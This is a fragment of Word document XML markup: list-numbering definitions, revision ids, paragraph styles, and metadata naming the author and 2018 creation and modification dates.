      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="650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7" w:tplc="F56A8DA2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="722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8" w:tplc="1C3CB0E4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="794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67111D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66149768"/>
    <w:lvl w:ilvl="0" w:tplc="FCD40F1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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4000E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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3EAD3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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E413D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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CC6D48">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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CE2534">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6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C60EDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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D48F72">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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90C08E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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0842B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EEBE9BD4"/>
    <w:lvl w:ilvl="0" w:tplc="97507F94">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2731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1" w:tplc="D3B6A854">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="290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2" w:tplc="1FB0EF5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="362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3" w:tplc="D430BAB0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="434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4" w:tplc="70946DD0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="506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5" w:tplc="288A7B54">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="578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6" w:tplc="BD1C7270">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="650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7" w:tplc="A4E0D2F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="722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  <w:lvl w:ilvl="8" w:tplc="30FA429C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7943"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="5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4E7EC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABC2D2EA"/>
    <w:lvl w:ilvl="0" w:tplc="4894ED3C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F5473B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB38CD72"/>
    <w:lvl w:ilvl="0" w:tplc="1AA45776">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•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CBF2C05C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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2A10F6B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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4FBC480A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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11B845DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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9892806A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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E6F007E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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87183982">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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BD26075C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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0F3701"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B9C1716"/>
    <w:lvl w:ilvl="0" w:tplc="E67A6FB6">
      <w:start w:val="46"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="25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C80624">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="29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E8E17A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="36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CFA9A88">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="43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B242114">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="50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BE2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="57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729CBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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A4E1F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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629098">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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626377"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="441AED8C"/>
    <w:lvl w:ilvl="0" w:tplc="C3D07F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52E69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834B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6662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EAD5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B1B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F6C55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4918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226F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C67C81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D98E190"/>
    <w:lvl w:ilvl="0" w:tplc="FBCA2BAC">
      <w:start w:val="32"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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DDE3A98">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="29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6B2CF82">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="36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284780">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="43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3C78DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="50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8679F8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="57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7ED79A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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4C5FB4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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70C686">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7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3A"/>
    <w:rsid w:val="000301ED"/>
    <w:rsid w:val="000302E6"/>
    <w:rsid w:val="000317F7"/>
    <w:rsid w:val="000B63DA"/>
    <w:rsid w:val="000C12E3"/>
    <w:rsid w:val="000C4F11"/>
    <w:rsid w:val="000E036C"/>
    <w:rsid w:val="000E3B8A"/>
    <w:rsid w:val="000F6743"/>
    <w:rsid w:val="000F6997"/>
    <w:rsid w:val="00110A09"/>
    <w:rsid w:val="00113441"/>
    <w:rsid w:val="00113788"/>
    <w:rsid w:val="001750E6"/>
    <w:rsid w:val="0018784A"/>
    <w:rsid w:val="00190899"/>
    <w:rsid w:val="001B19C8"/>
    <w:rsid w:val="001B31A1"/>
    <w:rsid w:val="001B6849"/>
    <w:rsid w:val="001B698F"/>
    <w:rsid w:val="001C439C"/>
    <w:rsid w:val="001E43F7"/>
    <w:rsid w:val="001F1B20"/>
    <w:rsid w:val="00200CB3"/>
    <w:rsid w:val="002050EE"/>
    <w:rsid w:val="00210602"/>
    <w:rsid w:val="00213251"/>
    <w:rsid w:val="00232CD9"/>
    <w:rsid w:val="00251FAA"/>
    <w:rsid w:val="00253F9B"/>
    <w:rsid w:val="00260901"/>
    <w:rsid w:val="0027385D"/>
    <w:rsid w:val="00292EE0"/>
    <w:rsid w:val="002C33AA"/>
    <w:rsid w:val="002D1CD2"/>
    <w:rsid w:val="002D29B0"/>
    <w:rsid w:val="0031706D"/>
    <w:rsid w:val="00326901"/>
    <w:rsid w:val="00343618"/>
    <w:rsid w:val="00374FF2"/>
    <w:rsid w:val="00376B85"/>
    <w:rsid w:val="00382156"/>
    <w:rsid w:val="003A7112"/>
    <w:rsid w:val="003C572F"/>
    <w:rsid w:val="00404418"/>
    <w:rsid w:val="00416418"/>
    <w:rsid w:val="004327B1"/>
    <w:rsid w:val="004332A1"/>
    <w:rsid w:val="004435C0"/>
    <w:rsid w:val="00450AF2"/>
    <w:rsid w:val="00454796"/>
    <w:rsid w:val="00460CD0"/>
    <w:rsid w:val="00475AC8"/>
    <w:rsid w:val="0049227F"/>
    <w:rsid w:val="00494E79"/>
    <w:rsid w:val="004A2A45"/>
    <w:rsid w:val="004E2763"/>
    <w:rsid w:val="004E32E3"/>
    <w:rsid w:val="004F4168"/>
    <w:rsid w:val="0051228D"/>
    <w:rsid w:val="00525769"/>
    <w:rsid w:val="00527E94"/>
    <w:rsid w:val="00544E74"/>
    <w:rsid w:val="005456B7"/>
    <w:rsid w:val="005457D8"/>
    <w:rsid w:val="00554414"/>
    <w:rsid w:val="00566794"/>
    <w:rsid w:val="0058110E"/>
    <w:rsid w:val="00590648"/>
    <w:rsid w:val="005A09FF"/>
    <w:rsid w:val="005B34AE"/>
    <w:rsid w:val="005C3F53"/>
    <w:rsid w:val="005F38F9"/>
    <w:rsid w:val="0061067C"/>
    <w:rsid w:val="00642C48"/>
    <w:rsid w:val="00643D2D"/>
    <w:rsid w:val="00650D85"/>
    <w:rsid w:val="0065373D"/>
    <w:rsid w:val="00655D0C"/>
    <w:rsid w:val="006725BB"/>
    <w:rsid w:val="00693EB7"/>
    <w:rsid w:val="006A1130"/>
    <w:rsid w:val="006A3EFC"/>
    <w:rsid w:val="006A7518"/>
    <w:rsid w:val="006B1076"/>
    <w:rsid w:val="006C04DD"/>
    <w:rsid w:val="006C18AE"/>
    <w:rsid w:val="006D0A35"/>
    <w:rsid w:val="006E1A13"/>
    <w:rsid w:val="006E2401"/>
    <w:rsid w:val="006E729D"/>
    <w:rsid w:val="006F3C59"/>
    <w:rsid w:val="00731BB6"/>
    <w:rsid w:val="0075247F"/>
    <w:rsid w:val="00766CAC"/>
    <w:rsid w:val="0077789E"/>
    <w:rsid w:val="007B3894"/>
    <w:rsid w:val="007C12E7"/>
    <w:rsid w:val="007C5ECD"/>
    <w:rsid w:val="007D7019"/>
    <w:rsid w:val="007E560B"/>
    <w:rsid w:val="007F5F37"/>
    <w:rsid w:val="00811A8E"/>
    <w:rsid w:val="00817E8D"/>
    <w:rsid w:val="00825070"/>
    <w:rsid w:val="00827FA0"/>
    <w:rsid w:val="008451E3"/>
    <w:rsid w:val="00847092"/>
    <w:rsid w:val="00850D1B"/>
    <w:rsid w:val="008766B9"/>
    <w:rsid w:val="00885E5A"/>
    <w:rsid w:val="008A183B"/>
    <w:rsid w:val="008A679D"/>
    <w:rsid w:val="008D2686"/>
    <w:rsid w:val="009022DE"/>
    <w:rsid w:val="00902438"/>
    <w:rsid w:val="00904733"/>
    <w:rsid w:val="00946841"/>
    <w:rsid w:val="0094733B"/>
    <w:rsid w:val="009837C6"/>
    <w:rsid w:val="009905A5"/>
    <w:rsid w:val="009A48DA"/>
    <w:rsid w:val="009B1BD8"/>
    <w:rsid w:val="009B3BBC"/>
    <w:rsid w:val="009F1576"/>
    <w:rsid w:val="00A058CD"/>
    <w:rsid w:val="00A27AA3"/>
    <w:rsid w:val="00A458C4"/>
    <w:rsid w:val="00A46723"/>
    <w:rsid w:val="00A54B55"/>
    <w:rsid w:val="00A57FC7"/>
    <w:rsid w:val="00A77CBD"/>
    <w:rsid w:val="00AA54C8"/>
    <w:rsid w:val="00AB0061"/>
    <w:rsid w:val="00AC32B0"/>
    <w:rsid w:val="00AE53A5"/>
    <w:rsid w:val="00B02A49"/>
    <w:rsid w:val="00B16707"/>
    <w:rsid w:val="00B30434"/>
    <w:rsid w:val="00B40403"/>
    <w:rsid w:val="00B46922"/>
    <w:rsid w:val="00B46D42"/>
    <w:rsid w:val="00B47BE6"/>
    <w:rsid w:val="00B5563A"/>
    <w:rsid w:val="00B80085"/>
    <w:rsid w:val="00B8251A"/>
    <w:rsid w:val="00B96B34"/>
    <w:rsid w:val="00BB0FE5"/>
    <w:rsid w:val="00BC0AB6"/>
    <w:rsid w:val="00BC5E52"/>
    <w:rsid w:val="00BE00C2"/>
    <w:rsid w:val="00BE095B"/>
    <w:rsid w:val="00BE4040"/>
    <w:rsid w:val="00C20C86"/>
    <w:rsid w:val="00C2348E"/>
    <w:rsid w:val="00C25CAB"/>
    <w:rsid w:val="00C26925"/>
    <w:rsid w:val="00C3594D"/>
    <w:rsid w:val="00C41A25"/>
    <w:rsid w:val="00C51F66"/>
    <w:rsid w:val="00C56750"/>
    <w:rsid w:val="00C74DAE"/>
    <w:rsid w:val="00C92BD2"/>
    <w:rsid w:val="00CB28EC"/>
    <w:rsid w:val="00CB64F7"/>
    <w:rsid w:val="00CF5C03"/>
    <w:rsid w:val="00D01474"/>
    <w:rsid w:val="00D25860"/>
    <w:rsid w:val="00D729CA"/>
    <w:rsid w:val="00D834C7"/>
    <w:rsid w:val="00D90643"/>
    <w:rsid w:val="00D968DC"/>
    <w:rsid w:val="00DB3A96"/>
    <w:rsid w:val="00DC3E2B"/>
    <w:rsid w:val="00DC5910"/>
    <w:rsid w:val="00DD023A"/>
    <w:rsid w:val="00DF028C"/>
    <w:rsid w:val="00E00CF6"/>
    <w:rsid w:val="00E07428"/>
    <w:rsid w:val="00E43563"/>
    <w:rsid w:val="00E4526C"/>
    <w:rsid w:val="00E92242"/>
    <w:rsid w:val="00EB4A72"/>
    <w:rsid w:val="00ED5758"/>
    <w:rsid w:val="00EE6121"/>
    <w:rsid w:val="00EF0D8E"/>
    <w:rsid w:val="00F04ED0"/>
    <w:rsid w:val="00F07015"/>
    <w:rsid w:val="00F1636D"/>
    <w:rsid w:val="00F27A30"/>
    <w:rsid w:val="00F37ABE"/>
    <w:rsid w:val="00F44F8E"/>
    <w:rsid w:val="00F5129A"/>
    <w:rsid w:val="00F53AAC"/>
    <w:rsid w:val="00F62BBA"/>
    <w:rsid w:val="00F677E8"/>
    <w:rsid w:val="00F753DF"/>
    <w:rsid w:val="00F86BC8"/>
    <w:rsid w:val="00FB3E63"/>
    <w:rsid w:val="00FC126D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EB1D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AEB3094D-F1D5-4B32-9817-7CD943AB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526C"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="0" w:line="48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526C"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0" w:line="480" w:lineRule="auto"/>
      <w:jc w:val="both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6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526C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E4526C"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cstheme="majorBidi"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PargrafodaLista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00213251"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid">
    <w:name w:val="TableGrid"/>
    <w:rsid w:val="00A458C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4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946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6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1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7D7-D143-456E-B43A-B91C5A1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6</Pages>
  <Words>6999</Words>
  <Characters>37795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ON APARECIDO RIBEIRO SOARES</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>CLEYSON APARECIDO RIBEIRO SOARES</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-04-20T14:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-31T19:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>